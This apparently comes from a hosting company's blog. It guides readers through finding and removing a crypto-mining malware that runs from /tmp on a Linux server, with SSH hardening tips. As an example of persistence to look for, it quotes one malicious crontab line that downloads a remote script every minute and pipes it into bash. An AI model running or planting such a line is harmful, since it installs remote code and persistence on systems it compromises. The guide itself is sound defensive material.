Are you trying to get rid of malicious tmp processes or files?
This guide is for you.
The name TMP also turns up in a different context: on Windows, TMP is an executable file downloaded and used by the rogue antivirus Fake Microsoft Security Essentials Alert, which floods the desktop with pop-up alerts claiming the computer is infected. The case in this guide is a Linux server, where the attacker drops files under /tmp and /var/tmp.
Recently, one of our customers contacted us citing a process in the CPU statistics (top) that consumed around 90% of the CPU.
It turned out to be a crypto-mining malware and had to be removed from the server.
Here at Ibmi Media, as part of our Server Management Services, we regularly help our customers to resolve Linux related errors.
In this context, we shall look into how to resolve malicious tmp processes issue.
A malicious tmp process is normally the last step of a short attack chain:
i. A brute-force attack against SSH accounts (weak or default passwords).
ii. Once access is obtained, automated installation of a pre-compiled binary, typically under /tmp or /var/tmp.
iii. Modification of the system, for example a crontab entry, so the malware is re-downloaded and restarted after a reboot or a cleanup.
iv. Mining cryptocurrency on the victim's CPU or GPU.
The mining itself is usually not destructive, but there is no way to be sure what else was changed during the intrusion, so the only safe course is to rebuild the affected system from known-good backups, which is time-consuming. The steps below remove the miner and its persistence; treat them as containment, not as proof that the host is clean.
Here, you will learn how to resolve this problem.
To begin, we check whether the process is running using the command given below:
ps aux | grep <processname>
Next, list the crontab of the user the process runs as:
crontab -u username -l
If it contains an entry like this (run every minute, download a script and pipe it straight into bash):
* * * * * wget -q -O - http://192.98.132.xxy:8220/mr.sh | bash -sh > /dev/null 2>&1
then either edit the crontab and remove that entry:
crontab -e -u username
OR
delete the user's entire crontab (this also removes any legitimate jobs, so prefer editing if the user has other entries):
crontab -r -u username
Also check /etc/crontab, /etc/cron.d and the crontabs of other users, since the downloader may have added itself in more than one place.
Then kill the running process (the crontab entry would otherwise have restarted it) and delete the corresponding files in /var/tmp and /tmp:
/var/tmp/sustes
/var/tmp/sustes3
/var/tmp/wc.conf
/var/tmp/123
To protect against these attacks, here are the steps our Support Experts suggest to our customers.
1. Disable all default system login accounts.
2. Disable SSH password logins and use SSH key authentication instead.
3. Enable two-factor authentication for SSH.
4. Block access to all network services that do not need to be exposed to the Internet (for example databases, control panels and the SSH port, which should be reachable only from known addresses).
5. Monitor systems for unusual CPU, memory, disk and network activity; a miner shows up as sustained high CPU from a process running out of /tmp or /var/tmp.
6. Use host-based intrusion detection to spot any problems that slipped through.
This article covered a method to resolve malicious tmp processes. A closing note on why temp directories are the attacker's folder of choice: the first thing a malware installer (the first stage of infection, whether a dropper or a downloader) does when executed on a target system is to install a copy of the malware and its components into their locations on the system.
It could do this in any folder, but on Windows it typically uses the standard Temp folder, just as the Linux miner above used /tmp and /var/tmp.
Temporary files are a normal part of software installation (write to a TMP file, then move it into place), so a transient TMP file in those folders draws little attention, an advantage attackers currently enjoy.
Most malware installers delete themselves and these TMP files after a successful installation.